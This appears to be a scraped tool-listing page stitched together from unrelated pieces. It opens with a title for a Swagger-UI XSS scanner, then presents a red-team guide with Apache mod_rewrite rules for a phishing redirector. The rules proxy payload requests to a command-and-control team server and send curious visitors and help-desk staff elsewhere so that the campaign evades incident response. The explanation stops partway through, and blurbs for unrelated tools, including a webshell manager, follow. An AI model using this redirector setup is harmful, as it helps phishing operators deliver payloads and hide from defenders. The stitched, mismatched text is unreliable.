XSSwagger
A simple Swagger-ui scanner that detects old versions vulnerable to various XSS attacks
There have been times when a curious phish recipient or a zealous help desk staff member has loaded the phishing link in their browser and decided to take a peek at a higher directory or the root domain. Of course, most times there isn't much else on the site to see. In those cases, the chances of being reported to IR went up significantly, sometimes leading to a phishing campaign being blocked. This is where invalid URI redirection comes in handy. We can whitelist the resources the Apache server will proxy for the targets and redirect any other requests to the target's real domain or another page of our choosing. In the demo below, the user navigates to spoofdomain.com/really/long/url.html and is served a page; however, when the user navigates to spoofdomain.com/really/ the browser is redirected to google.com.

RewriteEngine On
RewriteCond %{REQUEST_URI} ^/(profiler|payload)/?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^http://SPOOFED-DOMAIN.com [NC]
RewriteRule ^.*$ http://TEAMSERVER-IP%{REQUEST_URI} [P]
RewriteRule ^.*$ http://REDIRECTION-URL.com/? [L,R=302]

Line by line explanation:
Enable the rewrite engine.
If the request's URI is either '/profiler' or '/payload' (with an optional trailing slash), ignoring case; OR
If the request's referer starts with 'http://SPOOFED-DOMAIN.com', ignoring case;
AWS Web Application Firewall (WAF) for protecting web applications from common exploits.
A technology lookup and lead generation tool that identifies the technology stack of any website and provides features for market research, competitor analysis, and data enrichment.
A webshell manager via terminal for controlling web servers running PHP or MySQL.
A comprehensive web application security testing solution that offers built-in vulnerability assessment and management, as well as integration options with popular software development tools.
A CSP plugin for hapi with per-route configuration options.